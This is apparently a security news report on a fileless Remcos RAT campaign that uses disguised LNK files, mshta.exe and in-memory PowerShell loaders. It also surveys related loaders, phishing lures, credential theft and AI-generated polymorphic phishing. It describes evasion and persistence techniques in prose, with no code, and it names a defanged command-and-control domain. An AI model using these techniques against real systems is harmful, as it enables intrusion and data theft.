A stealthy new malware campaign is exploiting PowerShell-based loaders and LNK files to deploy Remcos RAT malware, giving attackers full remote access to compromised Windows systems. Researchers at Qualys have detailed the sophisticated attack chain, which starts with a simple ZIP archive and ends with complete system control.
The attackers are distributing malicious LNK files disguised as tax-related documents inside ZIP archives. Once a user opens the shortcut file, it triggers mshta.exe, a legitimate Windows tool used to execute HTML Applications (HTA). This launches an obfuscated remote file named xlab22.hta, which contains Visual Basic Script designed to fetch additional payloads—including another HTA file and a PowerShell script.
The PowerShell script reconstructs a shellcode loader directly in memory, which then deploys the Remcos RAT payload—without ever touching the disk.
Fileless Malware: Inside the Remcos Attack Chain
This campaign is part of a growing trend of fileless malware, where attackers avoid writing to disk and instead operate entirely in system memory to avoid detection. Once launched, the Remcos RAT malware grants full control over the infected machine. It can log keystrokes, capture screenshots, record clipboard activity, list running processes, and even exfiltrate data to its command-and-control server (readysteaurants[.]com) using encrypted TLS connections.
The malware also achieves persistence by modifying Windows Registry keys to launch itself at startup via the 311.hta file—one of the second-stage payloads downloaded early in the attack.
Remcos, compiled as a 32-bit binary in Visual Studio C++, is popular among cybercriminals due to its lightweight footprint, robust spying features, and flexibility. This isn’t the first time it has appeared in a fileless form: Fortinet previously spotted similar behavior in a phishing campaign in November 2024 that used fake order confirmations to lure victims.
By using legitimate tools like mshta.exe and PowerShell, threat actors bypass antivirus and endpoint detection systems. “This fileless malware operates directly in memory, using LNK files and MSHTA.exe to execute obfuscated PowerShell scripts that can bypass conventional defenses,” said SlashNext CTO J. Stephen Kowski. He stressed the need for advanced email security to detect malicious LNK attachments and real-time PowerShell monitoring.
Broader Surge in Loader Malware, Credential Theft, and AI-Powered Phishing
The Remcos campaign isn’t operating in isolation. New research from Palo Alto Networks Unit 42 and Threatray has uncovered a multi-stage .NET-based loader that’s being used to launch other common malware strains like Agent Tesla, NovaStealer, VIPKeylogger, XLoader, and XWorm.
These loaders use encrypted .NET DLLs and steganographic techniques—such as hiding payloads in bitmap images—to evade detection. Once decrypted, these payloads execute in memory just like Remcos, reinforcing a broader trend of fileless delivery mechanisms designed to circumvent traditional defenses.
Meanwhile, attackers are getting more creative with phishing lures. Recent tactics include:
- KeeLoader, a trojanized KeePass installer hosted on typosquat domains, used to steal admin credentials and deploy Cobalt Strike beacons.
- ClickFix lures embedded in PDFs that lead to Lumma Stealer payloads through multiple dropper URLs.
- Formbook info-stealers delivered via Microsoft Office documents wrapped with Horus Protector malware.
- Phishing via blob URIs, leveraging trusted domains like
onedrive.live.comto redirect victims to malicious HTML pages. - RAR archives masquerading as software installers, used to distribute NetSupport RAT in attacks targeting Ukraine and Poland.
- Telegram bot-enabled credential theft, where HTML email attachments harvest Gmail, Hotmail, and Outlook credentials and exfiltrate them to a bot dubbed “Blessed logs”, active since February 2025.
Adding to the complexity, attackers are now using AI-powered polymorphic campaigns that change email subject lines, body content, and sender names in real-time to bypass static email filters. These AI-generated messages adapt on the fly, defeating perimeter-based defenses and requiring post-delivery threat detection to contain the damage.
“AI has given threat actors the tools to automate malware development and personalize phishing attacks with alarming precision,” said researchers at Cofense. “Traditional email filters are no longer enough—organizations need solutions that monitor user inboxes in real time and detect threats after delivery.”
As campaigns like the Remcos RAT malware operation evolve, defenders must prepare for multi-layered threats that blend social engineering, fileless malware, and adaptive phishing—all within a single, seamless attack.
